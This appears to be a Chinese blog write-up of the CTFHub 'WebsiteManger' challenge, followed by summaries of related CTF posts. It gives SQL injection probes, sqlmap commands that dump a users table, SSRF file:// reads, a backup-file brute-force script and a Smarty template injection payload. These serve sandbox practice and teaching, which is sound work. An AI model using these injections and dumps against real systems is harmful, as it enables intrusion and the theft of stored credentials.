CTFHUB WEBSITE WEBMANAGER 通关

最新推荐文章于 2022-10-24 14:24:16 发布
最新推荐文章于 2022-10-24 14:24:16 发布
阅读量337 收藏
点赞数
分类专栏: CTFHUB 文章标签: sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43338937/article/details/120233164
版权

考点

ssrf

布尔盲注

测试登录页面 username参数位置可以进行布尔盲注

手工测试 a" or sleep(2)--+

参数使用post提交

保存数据包

利用sqlmap工具进行注入获取数据库 表 用户密码

python3 sqlmap.py -r a.txt --data="username=a&password=a" -p username --curent-db

python3 sqlmap.py -r a.txt --data="username=a&password=a" -p username -D ctf -T users --dump

 爆破密码时,需要较长时间

利用密码进行登录  进入到文件读取页面

  抓包利用file伪协议获取flag

此次题目中可能存在其他sql注入点,读者可利用后台工具扫描目录结构,在进行sql注入,发散思维。

qq_43338937
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebApplication与WebSite区别.rar_webapplication_website
09-21
在IT领域,尤其是在Web开发中,`WebApplication`和`WebSite`是两个常见的概念,它们代表了构建和运行Web应用程序的不同方式。虽然两者都与Web服务器和HTTP协议相关,但它们之间存在显著的差异,这些差异涉及项目结构...
CTFhub---WebsiteManger
jiet07的博客
11-09 2021
思路 进入题目:刷新,图片会更新 新建标签页打开,有id参数 使用sqlmap 进行测试
CTFHub_2021-第四届红帽杯网络安全大赛-Web-WebsiteManger
weixin_40872714的博客
03-26 1580
CTFHub_2021-第四届红帽杯网络安全大赛-Web-WebsiteManger(布尔盲注、SSRF ) 场景描述:最新的网站测试器,作为非站长的你,能利用好它的功能吗? 场景打开后,如下,是个登录框 查看源码,发现可能的注入点 /image.php?id=2 布尔盲注 /image.php?id=if(1=1,1,5) True /image.php?id=if(1=2,1,5) False 条件为真时?id=1,回显第一张图片,条件为假时?id=5,没有id=5的图片,什么都没有。即可
ctfhub-历年真题web-WebsiteManger
Ewige的博客
07-12 1590
ctfhub 历年真题 webWebsiteManger题目考点解题思路 WebsiteManger 题目考点 布尔盲注 SSRF 解题思路 进行登入点使用sqlmap 测试无果 仔细观察, 图片链接处存在注入点 使用sqlmap进行测试 sqlmap -u "http://challenge-94b51247b7b2ac6f.sandbox.ctfhub.com:10800/image.php?id=3" --tamper space2mysqlblank --technique=B --
CTFHUBWeb安全—信息泄露
最新发布
Lucky小小吴的小屋
10-24 3080
本模块有十道题 目录遍历 phpinfo 备份文件下载(4道) 网站源码 bak文件 vim缓存 .DS_Store Git泄露 SVN泄露 HG泄露
CTFHub-web详解
shayebudon的博客
11-20 3431
信息泄露 目录遍历 遍历每一个文件夹,找到flag.txt,复制内容提交 PHPINFO 打开页面,从信息中寻找flag。 备份文件下载 网站源码 尝试各种组合,最后发现在网站后添加www.zip后成功下载压缩文件 将解压后的文件名放在url后,即可出现flag bak文件 下载index.php.bak打开即可看到flag vim缓存 当开发人员在线上环境中使用 vim 编辑器,在使用过程中会留下 vim 编辑器缓存,当vim异常退出时,缓存...
Website Theme Manager-crx插件
04-03
语言:English 更改所需网站的外观! 从userstyles.org中选择您的样式或编写您自己的样式! 网站主题管理器可自定义网站的外观; 您可以从userstyles.org网站选择所需的样式,也可以编写自己的样式。...
website.zip_WEB开发_C#_
08-12
【标题】"website.zip" 是一个包含Web开发项目的压缩包,该项目使用了C#编程语言进行构建。这个项目的核心是一个具备后台管理功能的网站模板,适用于中小企业进行网站开发。 【描述】该压缩包中的源代码展示了一个...
MetaCLADE_webserver
04-09
MetaCLADE_webserver 介绍 该项目包括实施一个托管MetaCLADE程序的网站。 这样,国际科学界将能够轻松地使用它。 MetaCLADE是一种用于确定序列结构的算法,优点是可以使用宏基因组数据或元转录组数据。 描述 Web...
website-host-api
05-23
如何使用 | 您必须先下载node.js。 | 使用“建议大多数用户使用的版本” | 然后键入以下命令以安装所需的模块| ... npm安装jQuery npm install -g @ angular / cli ... | 键入“节点”。 在终端启动。...
ctfhub web全部做题记录(持续跟新)
01-08
信息泄露 目录历遍 直接找就行。。。 PHPINFO 进去直接 ctrl+f 搜flag就行。。。 备份文件下载 网站源码 提示一些相关的名字 可以写个简单的脚本爆破一下 当然也可以 dirsearch 直接扫 import requests url = http://challenge-c93f188d4781b829.sandbox.ctfhub.com:10080/ a = ['web','website','backup','back','www','wwwroot','temp'] b = ['tar','tar.gz','zip','rar'] for i in a: fo
2021红帽杯 WebsiteManger
LYJ20010728的博客
06-22 745
2021红帽杯 WebsiteManger考点思路Payload 考点 布尔盲注、SSRF 思路 尝试一般的登录方法没得用处,F12查看,登录框没有sql注入的利用点,发现还有一张图片,好家伙,sql注入的利用点在图片上 当id的值为0时没有图片回显,利用布尔盲注得到用户密码:14348d305648989c355433b9a04dffce,用户名为:admin,登录进去一个很明显的ssrf考点 猜测 flag在根目录下:file:///flag Payload 盲注脚本 impo
CTFHubweb基础刷题记录
bmth666的博客
03-12 3153
CTFHub之从入门到入土。第一部 信息泄露全方位解析+密码泄露wp
CTFHub通关
weixin_43184518的博客
07-06 8076
CTFHub通关 这篇文章主要为我在ctfhub上的通关过程,作为记录方便以后查看。
CTFHubweb进阶学习
bmth666的博客
01-13 1953
文章目录PHPBypass disable_functionLD_PRELOADShellShock(未完成)Apache Mod CGI(未完成) PHP Bypass disable_function PHP 的 disabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用 有四种绕过 disable_functions 的手法: 攻击后端组件,寻找存在命令注入的 w...
CTFHub-web(基础认证)
分享与记录
03-26 8921
发现题目需要登录,先任意输入admin/admin进行登录尝试。没什么反应。抓包看数据。可以看见一条特殊字符串Basic realm="Do u know admin ?,暂时没有其他线索,我们假设用户名就是admin,然后进行暴力破解。 Basic表示基础认证,字符串格式xxxxxxxxx==大概率为Base64编码 Base64解码得到开始尝试输入的账号和密码 将报文发送到Intrude...
CTFHub——Web技能树
mcmuyanga的博客
01-23 762
CTFHub Web 网上收集的资料,本地上传,原文链接丢失,只是整理了一下,记录一下做题过程, 信息泄露 目录遍历 用python脚本找一下flag.txt的路径 import requests url = "http://challenge-9360ebe6745e6c45.sandbox.ctfhub.com:10080/flag_in_here/" for i in range(5): for j in range(5): url_test =url+"/"+s
[WRITEUP]第一届四叶草网络安全学院牛年CTF大赛WRITEUP
Y4tacker的博客
02-26 3440
第一届四叶草网络安全学院牛年CTF大赛WRITEUP 队伍信息战队名称 战队成员姓名:Firebasky、Y4tacker、lastsward、atao、m1n9yu3 解题情况战队排名答题情况Web WebGET 首先传?flag=1,发现似乎是smarty, 测试{$smarty.version}, 成功过滤cat,用tac发现是smarty注入简单了 那就flag={if passthru(“tac fl*”)}{/if} 即可获得flag WEBsite 首先打开页面看到接收url参数,是ssrf考
BUUCTF [FBCTF2019] Products Manager
Senimo
01-08 1407
BUUCTF [FBCTF2019] Products Manager 考点: 启动环境: 产品管理,其中有三个功能: 查看前5的产品 添加产品 查看产品细节 知道了大致功能,尝试正常的业务逻辑,首先添加产品,其Secret值需包含10位以上的大小写字母和数字: 添加成功,查询产品细节: 分析题目给出的源码: 其中footer.php页面没用,header.php页面只是首页的三个跳转链接,index.php页面也没有可利用内容。 在db.php页面中,查看到如下SQL语句: CREATE
优化Web设计,让用户无需思考
- Web usability is all about making websites easy to navigate and use for visitors without them having to think too much. The goal is to create a seamless user experience that guides users through the...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值